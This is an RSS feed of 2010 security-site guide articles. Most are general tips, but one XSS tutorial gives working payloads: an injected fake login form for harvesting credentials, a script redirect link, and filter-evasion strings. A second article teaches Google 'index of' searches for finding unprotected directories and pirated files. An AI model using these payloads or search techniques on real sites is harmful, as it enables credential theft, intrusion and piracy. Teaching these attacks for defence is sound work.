<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
	<title>Guides - Articles</title>
	<link>http://www.astalavista.com/page/articles/_/guides/</link>
	<pubDate>Fri, 10 Feb 2012 05:27:56 +0000</pubDate>
	<ttl>43200</ttl>
	<description></description>
	<item>
		<title>How to Improve Your Computer’s Security</title>
		<link>http://www.astalavista.com/page/articles/_/guides/how-to-improve-your-computer%e2%80%99s-security-r52</link>
		<description><![CDATA[These days, hackers are always on the lookout for vulnerable computer systems that they can exploit. This is one of the reasons why computer security is such a hot topic nowadays. Hackers do this for a number of reasons. Some do it for fun while most do it for profit. This is because many people store credit card information as well as other valuable information on their computers. Unscrupulous individuals take advantage of computers with weak security to gain access to this information for criminal purposes. Many companies and organizations have been the targets of countless hackers trying to steal information or take over computer resources. However, home users are also in a lot of danger. The good news is that there are many effective methods of beefing up your computer’s security. Here are some quick and easy tips to keep these cyber-criminals at bay.<br />
<br />
<br />
<strong class='bbc'>Use your Firewalls</strong><br />
<br />
Most operating systems come with built-in firewalls that can be used to improve computer security. However, not many people know how to use their firewalls properly. A firewall with inadequate settings can easily be breached by hackers. This is one of the reasons why it is so important to learn how to configure your firewall with the correct security settings.<br />
<br />
<br />
<strong class='bbc'>Learn about your Computer’s Entry Points</strong><br />
<br />
Entry points are very similar to doors that a hacker can use to gain access to your system. By learning about all of the entry points your computer has, you will be able to improve your computer’s security and prevent hacking attempts on your system. However, most computers have numerous entry points and it can be difficult to learn about them all. This is where security experts can help you. This is especially important if you run a small network in your business.<br />
<br />
<br />
<strong class='bbc'>Increase your Awareness</strong><br />
<br />
Hacking is now an unfortunate part of the world we live in. This is one of the reasons why you should do all you can to learn about hacking and computer security measures. Even if you are not a tech-savvy person, you can still keep your computer safe by learning about the importance of security updates, program patches and anti-virus software. There are many easy-to-use tools available in the market today; all you need to do is learn which items you need and how to use them effectively.<br />
<br />
<br />
<strong class='bbc'>Testing your Network’s Security</strong><br />
<br />
Performing an attack and penetration test is a very good way of analyzing the security of your network. This method is used to identify potential weak points in your computer network. Once you identify loopholes, you can then start implementing special measures to make your network harder to crack.<br />
<br />
<br />
<strong class='bbc'>Use Passwords</strong><br />
<br />
This is one of the simplest and most effective ways of making your system more secure. Learn how to create strong passwords that are difficult to crack. This will make your system very difficult to hack and access. You should also make it a habit to change your passwords every two months or so. Well-made passwords make use of both numbers and letters to make it more difficult for uninvited guests to log onto your computer.<br />
<br />
<br />
<strong class='bbc'>Monitor your Device Services</strong><br />
<br />
Your system uses many devices and services to work properly. However, some of these services pose a significant security threat to your system. You should disable services that you do not need to minimize the risk of someone breaking into your system.<br />
<br />
<br />
<strong class='bbc'>Use Anti-Virus Software</strong><br />
<br />
There are many reliable anti-virus software packages in the market today. This is one of the best ways to improve your computer’s security from viruses, Trojan horses, worms, bots, and hackers.]]></description>
		<pubDate>Wed, 29 Sep 2010 07:43:40 +0000</pubDate>
		<guid isPermaLink="false">37a749d808e46495a8da1e5352d03cae</guid>
	</item>
	<item>
		<title>Cross Site Scripting Version 1</title>
		<link>http://www.astalavista.com/page/articles/_/guides/cross-site-scripting-version-1-r35</link>
		<description><![CDATA[Cross Site Scripting - Version: 1<br />
Something that everyone should know | Something that everyone may not know<br />
Author: Kshitij kumar<br />
Email: krayknot@yahoo.com<br />
<br />
<br />
As the name implies, Cross Site Scripting means a sort of Scripting that is done outside the scope of the website. For example: A website is providing a text box to  input some text and a malicious user is entering some script(s) [ mostly Javascript ] inside that text box to execute those scripts on the server or anyway.<br />
“Cross Site Scripting” abbreviated as “XSS” not “CSS” as “CSS” has already denoted for “Cascading Style Sheet”.<br />
<br />
Website owners must know the serious consequences of XSS when exploited on a vulnerable web application. Site owners says that it cannot be used to steal sensitive data from their database. This is a common mistake. There are stories where it was claimed that XSS is not really a risk. and this is someting a challenge for the hackers and that hackers always willing to accept,<br />
A practical example of XSS on a test site<br />
The following example shows how XSS can be used to modify the functionality of a web page and to re-design the page as per the hackers will: [third party example]<br />
<br />
Load the following link in your browser: <a href='http://testasp.acunetix.com/Search.asp' class='bbc_url' title='External link' rel='nofollow external'>http://testasp.acunetix.com/Search.asp</a>, you will notice that the page is a simple page with an input field for running a search<br />
Try to insert the following code into the search field, and notice how a login form will be displayed on the page:<br />
<br />
&lt;br&gt;&lt;br&gt;Please login with the form below before proceeding:&lt;form action="destination.asp"&gt;&lt;table&gt;&lt;tr&gt;&lt;td&gt;Login:&lt;/td&gt;&lt;td&gt;&lt;input type=text length=20 name=login&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Password:&lt;/td&gt;&lt;td&gt;&lt;input type=text length=20 name=password&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;input type=submit value=LOGIN&gt;&lt;/form&gt;<br />
<br />
Then simply hit the search button after inserting the code.<br />
Through the XSS flaw on the page, it has been possible to create a FAKE login form which can gather a user’s credentials. As seen in step 2, the code contains a section which mentions “destination.asp”. That is where a hacker can decide where the FAKE login form will send the user’s log-in details for them to be retrieved and used maliciously<br />
A hacker can also inject this code by passing it around via the browser’s address bar as follows:<br />
<br />
<a href='http://testasp.acunetix.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value%3DLOGIN%3E%3C%2Fform%3E' class='bbc_url' title='External link' rel='nofollow external'>http://testasp.acune...3E%3C%2Fform%3E</a><br />
<br />
It is the process of injecting JavaScript (mainly) and also HTML into a webpage for important feedback. This feedback may contain many things;  one, most commonly being the user's cookie. A cookie is the variable that web-browsers use to store your login credentials. Without a cookie, you cannot "stay logged in" on your favorite websites. This is important because if somebody were to obtain your cookie, he/she could easily spoof your login information without any need of knowing your password. XSS is, in my opinion, the most common and dangerous exploit that exists on the internet today. It is dangerous because it is common (and useful), and it is common because it is most overlooked. Most WebPages today are user-interactive, which basically means that the website allows the user to interact with its content. Some of this interactivity may include search fields (most commonly), login forms, comment fields, feedback forms etc..<br />
<br />
XSS attacks can be termed as such attacks that bypass the system checks and act themselves as  a part of the system. This mainly happens due to the non-sanitizing structure of HTML that has the capability to take any command [ in the proper tags ] and to display it on the user end. One single hole in the website that allows to enter scripts can harm anything in the website, that can be any page content, cookie(s), link(s) or even the Page redirection statements on the client side.<br />
<br />
The malicious user can use mostly the Javascript to target any website. But XSS is not limited to Javascript only it may be JAVA, VBScript, Flash or any other web supported scripting language.<br />
<br />
Most of the big brands in the website colony has became the prey of XSS like Yahoo, Google, Orkut and Facebook with the loss of huge revenue. Now they have controlled the threat but not cent percent. Each and everyday more than 50% of the new websites are targeting for the XSS attacks due to their weak security and validation structure.<br />
<br />
There is no standard way of injecting XSS into any website. Even it is not necessary to have the XSS code inside the &lt;script&gt; tags. This may be any method, any combination of characters, even in the Hexadecimal format XSS can insert, but the main measure is that how the website accepts the input from the user and what type of input it accepts from the user.<br />
<br />
How it works<br />
HTML encoding structure is such that it accepts every command or phrase withing the tags( &lt;&#092;&gt; ) and hence there is a possibility to insert any tag(s) in a page that afterwards could act as a part of the same page with other HTML tag(s).<br />
<br />
At the first sight, it seems that the effect of the XSS is limited to only one user and previously at the beginning days of XSS the malicious scripts were responsible for the damage of User interface and some images only, but as the resources grew, technology advanced, the way of XSS injection changed tremendously.<br />
<br />
We can divide the XSS threats in two ways:<br />
1. Non Persistent scripts.<br />
2. Persistent Script.<br />
<br />
1. Non Persistent Scripts: If XSS attack is for some limited area only, eg: to change the behaviour, font, color of the website only then it is somewhat that can control.<br />
<br />
2. Persistent Script: But if the XSS attack is something that resides in the Server that can be more harmful for the complete system. Persistent XSS attack can even lead the complete system to be hacked.<br />
<br />
1. Basic XSS<br />
   When the user searches for something and the input is reflected on the page, this may show signs of XSS possibilities. If the user were to search for &lt;script&gt;alert(1)&lt;/script&gt;, and the returning page contained and alert box that read "1", the field is also vulnerable to XSS Injection.<br />
      <br />
2. HTTP Response Splitting<br />
   This has something to do with the headers that your browser uses to communicate to the server with. If the webpage allows you to modify them via post or get vars, and reflects the information back, you can easily modify these headers to your needs in order to cross-site script the page. Most commonly, the header's that are XSS'able are the User-Agent: headers. Most pages don't sanitize the user agent when reflecting back the user's browser properties (most commonly on a 404 page.)<br />
<br />
Previously the attacks were limited to the HTML only. for eg: I have to display my name in Bold and in Red Color and the website in which my profile is, not allows Text Formatting then i can add my name in tags like &lt;Font color = “Red” Bold = “True”&gt;MyName&lt;/Font&gt; and then i will save this string and if the website is simply displaying my name then this string will be treating as a part of HTML of the same page and the name will appear Bold and Red every time as the string “&lt;Font color = “Red” Bold = “True”&gt;MyName&lt;/Font&gt;” is saved in the database.<br />
<br />
You're passing a user's first name around from one page to another and then are displaying that querystring value on the page with a Response.Write, here you are increase the chances of  XSS.<br />
<br />
For Example:<br />
<a href='http://whatzit.com/whatthe/WebForm1.aspx?fName=Lumpy' class='bbc_url' title='External link' rel='nofollow external'>http://whatzit.com/w...spx?fName=Lumpy</a><br />
Now you want some changes:<br />
Response.Write(&#092;&#092;"Hello &#092;&#092;" + Request.QueryString(&#092;&#092;"fName&#092;&#092;"));<br />
When you run this code you get the following output:<br />
Hello Lumpy<br />
Here's some more that would produce the "Hello Lumpy" output:<br />
<a href='http://whatzit.com/whatthe/WebForm1.aspx?fName=Lumpy' class='bbc_url' title='External link' rel='nofollow external'>http://whatzit.com/w...spx?fName=Lumpy</a><br />
But here is something dangerous!<br />
<a href='http://whatzit.com/whatthe/WebForm1.aspx?fName=' class='bbc_url' title='External link' rel='nofollow external'>http://whatzit.com/w...rm1.aspx?fName=</a> &lt;script language='javascript'&gt;alert("beotch");&lt;/script&gt;<br />
now, the browser will popup a nice little box telling you "beotch"!<br />
Any code you execute in JavaScript can be piped into your site using the Cross Site Scripting vulnerability.<br />
Check out this..<br />
<a href='http://whatzit.com/whatthe/WebForm1.aspx?fName=&lt;script' class='bbc_url' title='External link' rel='nofollow external'>http://whatzit.com/w...x?fName=&lt;script</a> language='javascript'&gt;window.navigate('http://mrPron');&lt;/script&gt;<br />
Now, Check out this next line...<br />
&lt;a href="http:// whatzit.com/whatthe/WebForm1.aspx?fName=&lt;script language='javascript'&gt;window.navigate('http://mrPron');&lt;/script&gt;"&gt;Mole Hair Removal&lt;/a&gt;<br />
<br />
I send someone a valid link to a URL, maybe they do make it to the site, but they also get something else... the nasty little JavaScript in the link.<br />
<br />
But now a day(s) due to advent of new technologies like AJAX, DOM model(s), the situation is somewhat grave. How?<br />
A malicious user finds some information in a social networking website as follows:<br />
<br />
- Span tag (if available) or tag information of the “Sign Out” button, say the id of the &lt;span&gt; tag of Sign out is “spSIgnOut”.<br />
- a page where the user can enter text or Scraps.<br />
- all the input controls on the page [including hidden controls by using the Source of the Web page ].<br />
- all the input controls of which information saves in the database on postback.<br />
<br />
Here to understand we assume that the website is not optimized for XSS attacks.<br />
<br />
Now the malicious user enters a script in one of the text box inside &lt;script&gt; tag, in the script the user changing the InnerHTML of the span tag “spSignOut”:<br />
<br />
&lt;script language = ‘javascript’&gt;<br />
!--Code to change the innerhtml of the sign out span with the alert(‘you cannot sign out of the system’);<br />
&lt;/script&gt;<br />
<br />
After entering this command, the malicious user saves the scrap. Now on the opening of the same scrap the html link of the sign out link will have been changed. And this is inside the database, it will happen again and again. And by this way the malicious user would have been changed the HTML by XSS.<br />
<br />
You can now imagine how dangerous the XSS is.<br />
<br />
You can use some measures to avoid this like:<br />
1. Enocoding and Decoding of Tags if present in any input<br />
2. Disabling scripts<br />
3. Matching the Response and Request data on each postback.<br />
<br />
But can the traditional methods can stop the XSS threats??<br />
I think NO because here are some other methods to inject XSS like:<br />
<br />
'';!--"&lt;XSS&gt;=&{()}<br />
<br />
and,<br />
<br />
&lt;IMG SRC="javascript:alert('XSS');"&gt;<br />
<br />
and,<br />
<br />
&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;<br />
<br />
and,<br />
<br />
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
<br />
and,<br />
<br />
&lt;META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"&gt;<br />
<br />
and,<br />
<br />
exp/*&lt;A STYLE='no&#092;xss:noxss("*//*");<br />
xss:ex&#x2F;*XSS*//*/*/pression(alert("XSS"))'&gt;<br />
<br />
and,<br />
many other ways even i dont know<br />
<br />
So enjoy the article and in next Version 2 , I will share some more about the “XSS”<br />
<br />
Au rvoir!!]]></description>
		<pubDate>Tue, 10 Aug 2010 08:03:09 +0000</pubDate>
		<guid isPermaLink="false">7f1de29e6da19d22b51c68001e7e0e54</guid>
	</item>
	<item>
		<title>Using Google As A Powerful Hacking Tool</title>
		<link>http://www.astalavista.com/page/articles/_/guides/using-google-as-a-powerful-hacking-tool-r31</link>
		<description><![CDATA[Google is a very powerful search engine. It is the most used search engine and is also the most visited website on the entire Internet. If one knows how Google works, then exploiting its capability as a tool for hacking will not be that difficult. What Google does is that it tries to index everything on the Internet. The same way a diligent librarian will take note of all the books within the library and what kind of content is found within these books; except instead of a library we have the entire Internet, and instead of a librarian we have the gigantic and powerful company known as Google.<br />
<br />
Google does such a good job of indexing the Internet that by typing down a specific input, one could access content from a site which one would normally not be able to access, at least not for free— which leads to security for most sites to be terribly compromised. Google can even determine the relevance of a site making finding quality content even easier—again making security against hacking increasingly difficult. Hackers can freely use Google as a tool for hacking into websites, bypassing their security, and getting any of their content for free with relative ease. <br />
<br />
Files found on the Internet are saved just as files on one’s computer are saved. These files are organized into folders to make them easier to access and to use. As one would have a folder for music or documents on their computer, so do websites as well.  To access the contents of these websites, one can simply type down a command in the Google search bar in order for the folder with the desired content to appear in the search results.  As an example try typing down in a Google search box:<br />
 <br />
intitle:"index of" +"index of"  +size +name +description +modified<br />
<br />
When one types that down and clicks on enter, they will see the search results for all the un-protected directories that Google has found. Now let’s discuss exactly what each of those commands mean:<br />
<ul class='bbc'><li>intitle:”index of” – this will make Google only search for webpages with the term “index of” in title of their webpage. The term “intitle:” is known as an operator. So whenever one has intitle:”index of” in their search box, Google will only search for pages with “index of” within its title.<br /></li><li>+”index of” – this will make Google show only pages that have “index of” on its page. What the “+” means is that whatever succeeds the “+” must be found within the pages in the search results.</li></ul>
<br />
E.g. if one were to type in Google “banana + automobile” Google would provide all the pages which have the term banana and also the term automobile. But if were to type in Google “banana automobile” then the results would be pages with banana and automobile will show up in the results.<br />
<br />
Here are a few things to remember:<br />
<br />
<ul class='bbc'><li>Whatever one puts inside quotation marks will make Google search for that exact phrase.<br /></li><li>Whenever one adds a “+” will make certain that the following term is in the results pages.<br /></li><li>Whenever one adds a “-“ will make certain that the following term will not show up in the results.<br /></li><li>There are no spaces between “+” or “-“ between the terms.</li></ul>
<br />
Now that we understand how to customize our searches, we should now be able to use this to our advantage when looking for files such as games, music, or whatever kind of software we feel like. Let us say we are looking for an mp3. All we have to do is type down in the search box:<br />
<br />
intitle:"index of" +"index of"  +size +name +description +modified +mp3<br />
<br />
Simply by adding “+mp3” we can make sure that all the results will have the term mp3 within them. Now let’s look for something more specific. Let’s try looking for songs by deep purple. We simply type down:<br />
<br />
intitle:"index of" +"index of"  +size +name +description +modified +mp3 deep purple.<br />
<br />
Now Google will show results of songs in an mp3 format by deep purple that are ready for an easy download.<br />
Knowing how Google works, one can experiment with many different file types to find exactly what they are looking for—for free.]]></description>
		<pubDate>Fri, 06 Aug 2010 09:16:38 +0000</pubDate>
		<guid isPermaLink="false">1afa34a7f984eeabdbb0a7d494132ee5</guid>
	</item>
	<item>
		<title>How to Protect Your Business from Social Networ...</title>
		<link>http://www.astalavista.com/page/articles/_/guides/how-to-protect-your-business-from-social-networ-r26</link>
		<description><![CDATA[Different kinds of online businesses have already recognized the potential of social networking sites as powerful marketing tools. These sites actually serve as a perfect way to promote your business, reach a wider audience and meet potential clients and buyers. A social networking account would also allow you to establish a corporate profile that could be easily viewed by your prospective business partners and clients.<br />
<br />
However, even though creating an account in social networking sites could help you promote your online business, establishing accounts in such sites could also pose possible security threats. You have to be very careful with all the information you share in your page because this could pose dangerous security risks to your company. Even though you could anonymously post things in your profile in your home without needing to make any kind of physical contact with other people, you would still experience grave security threats if you are not cautious with the information you disclose. <br />
<br />
Here are things you can do in order to keep yourself safe from common social networking risks.<br />
<br />
<strong class='bbc'>Choose the information you share</strong><br />
<br />
The first thing you should do is to be careful with the things you post in your profile page, wall or any electronic form that could keep you exposed to unwanted visitors or other malicious threats. Some of the most important things you should never post in your website include names of people associated with your business, their phone numbers, addresses, and even their birthdates. Disclosing these details in various social networking sites could actually make you a potential victim of identity theft and of other security threats.<br />
<br />
 If ever you want to talk to some of your new contacts, you should privately contact them instead of chatting with them. It would be more advisable to disclose business-related information over the phone.<br />
<br />
<strong class='bbc'>Be careful with what you post</strong><br />
<br />
Before typing anything into your wall or profile page, you should think carefully about what you are planning to say. Never type negative things that involve insults, obscenities and even outrageous claims that could be used against your company’s name in the future. <br />
<br />
You should always remain professional while posting pictures and videos in social networking sites. Your profile picture could actually say a lot about the company you work for.<br />
<br />
<strong class='bbc'>Maximize privacy policies</strong><br />
<br />
Many social networking sites such as Facebook, Twitter and MySpace have already developed privacy policies in order to protect their members. Check your privacy settings and change it according to the amount of privacy you would like to experience. In these settings, you could choose the different people who could view your posts. You could even limit the visibility of your posts to some of your trusted contacts and friends.<br />
<br />
You should also check their privacy guidelines and determine whether you agree with their terms and conditions or not. If you do not like their privacy guidelines, you should probably stop yourself from joining their websites.<br />
<br />
<strong class='bbc'>Be careful when dealing with people online</strong><br />
<br />
Another important thing you could do in order to protect yourself from social networking security risks is to start being careful whenever you communicate with people online. Before disclosing important information to someone you have not personally met before, you should first do a background check and determine whether they are telling the truth about their identities or not. <br />
<br />
Utilize the particular set of business tools that you use for screening applicants and confirming the identities of your prospective business partners in order to verify their identities. Always check a person’s credibility before revealing business-related or financial information about yourself or your company.<br />
<br />
These are the best things you could do in order to protect yourself from serious social networking security threats. Once you have done the proper things to maintain the anonymity of your online business, you would never need to worry about identity thefts and other malicious security threats.]]></description>
		<pubDate>Mon, 26 Jul 2010 11:09:33 +0000</pubDate>
		<guid isPermaLink="false">069059b7ef840f0c74a814ec9237b6ec</guid>
	</item>
	<item>
		<title>Run a Background Check on Someone For Free</title>
		<link>http://www.astalavista.com/page/articles/_/guides/run-a-background-check-on-someone-for-free-r14</link>
		<description><![CDATA[A background check on someone for free is where you are able to look up and put together any criminal background history which is available. This can include useful information such as credit history, employment records, personal contact details, court records and much more. These background checks are mostly requested by potential employers usually hiring in high risk jobs such as teaching, security or hospitals. In the past, these types of background checks were once only able to be run by government agencies who would charge a fee for the service... but not anymore.<br />
<br />
Now, more and more services are available right here on the internet which allows anybody to run background checks on someone for free without the hassle of going through a second agency or third person. So whether you are a private employer or a big business you no longer have to pay and wait to find out about somebody you are willing to hire. You can have all of the information that you need right in front of you within a matter of minutes!<br />
<br />
These background checking facilities are being provided by private organizations on the internet which uses public records online to search through and find information such as criminal backgrounds and more. These public records can be anything from online credit reports to things such as networking sites and shopping sites. All you have to do is type in the name of the person you wish to run a free background check on and then sit back and wait. For a more detailed response, try adding more information such as a date of birth and an address and you can even search by social security number if you have access to such information.<br />
<br />
In order to find the best website for your needs, run a quick and easy comparison on any search engine so that you can find the website which suits you. Look for information available and search methods. This can include the different ways in which you can run background searches, look out for details you can type in such as names, addresses and more. You should also compare with other background checking websites to find out where it finds its information and whether or not it is reliable and up to date. Remember, it is easy to run a background check on somebody so why risk not doing it? Cover yourself and the other person by running background checks on someone for free today.<br />
<br />
If you would like to see a VIDEO on <a href='http://www.youtube.com/watch?v=d0KeeKN492A' class='bbc_url' title='External link' rel='nofollow external'>how to do a background check on someone for free</a>, than please <a href='http://www.youtube.com/watch?v=d0KeeKN492A' class='bbc_url' title='External link' rel='nofollow external'>CLICK HERE</a>.<br />
<br />
Article Source: <a href='http://EzineArticles.com/?expert=Mike_Hickmon' class='bbc_url' title='External link' rel='nofollow external'>http://EzineArticles...rt=Mike_Hickmon</a>]]></description>
		<pubDate>Mon, 05 Jul 2010 07:56:24 +0000</pubDate>
		<guid isPermaLink="false">5fd0b37cd7dbbb00f97ba6ce92bf5add</guid>
	</item>
	<item>
		<title>Ways of Extracting Gold From Printed Circuit Bo...</title>
		<link>http://www.astalavista.com/page/articles/_/guides/ways-of-extracting-gold-from-printed-circuit-bo-r11</link>
		<description><![CDATA[There are various methods to remove these minute traces of gold from printed circuit boards, processors, and other peripherals. First requirement is milling of the PCB to expose the gold in the chips. Various methods can be used to break or mill the printed circuit board. The easiest and cheapest way of extracting gold from Printed Circuit Boards would be to mechanically cut off the tops of the microchips and carry out forging to melt all the metal that is present inside the chip. Gold has a higher molecular weight which makes it denser and heavier than other metals. Hence, any of the traditional methods of separation such as skimming, draining lighter metals or settling tank for heavier metals can be used.<br />
<br />
There's another method for extracting gold from printed circuit boards in which, the Printed circuit board scrap is treated with one part concentrated nitric acid and two parts water at 70-80°C for 1 hour, which dissolves the base metals. As a result, it liberates the chips from the PCB.<br />
<br />
Note: We will refer printed circuit boards as PCB in short hereafter.<br />
<br />
Coming back to the process, after solid and liquid components are separated, the chips along with some metallic residue and Ti02 precipitate are mechanically crushed. This liberates the base and gold metal present within the protective plastic or ceramic chip.<br />
<br />
The base metals in this pulverized product are further dissolved by leaching with the same composition of nitric acid and water. The remaining solid residues, crushed chips and resin and solid particles of gold are treated with aqua regia by leaching process at varying and suitable times and temperatures. Gold is then precipitated from the leaching product with ferrous sulphate.<br />
<br />
There are plethora of options to extract gold from processors, PCBs, and other similar things. For extracting gold from printed circuit boards even in minute quantities, you may require a large number of PCBs. A metric ton would approximately have 80 to 1600 grams of gold. With evolving technology and development in PCB design, the amount of gold used for fabrication and creation of components is reduced. Moreover, before extraction you need to figure out the potential earnings involved with the amount of gold available on these PCBs, so that the cost of retrieving the gold does not exceed the cost of the gold obtained.<br />
<br />
More so, there are many more things to be considered, before you try anything of this sort, and try to gain handsome profits out of all your hard work. Hence, before extracting Gold from Printed Circuit Boards, you need to do an economic assessment on the value of the recoverable gold to make the process worthwhile.<br />
<br />
Various chemicals have the ability to remove and refine gold such as sodium cyanide and sodium meta nitro benzene sulphonate. Sodium cyanide is the cheapest available unless you can find calcium cyanide. However, the overall methodology is fairly complex in comparison to the other conventional ways. There are other ways of even using chemicals for Extracting Gold from Printed Circuit Boards. Looking for the Cheapest Way of Extracting Gold from Printed Circuit Boards - follow the link in resource box.<br />
<br />
You can find more information on extracting gold from PCBs, and many more ways of Extracting Gold from Processors<br />
<br />
Article Source: <a href='http://EzineArticles.com/?expert=Om_Thoke' class='bbc_url' title='External link' rel='nofollow external'>http://EzineArticles...expert=Om_Thoke</a>]]></description>
		<pubDate>Mon, 05 Jul 2010 07:45:48 +0000</pubDate>
		<guid isPermaLink="false">698d51a19d8a121ce581499d7b701668</guid>
	</item>
</channel>
</rss>
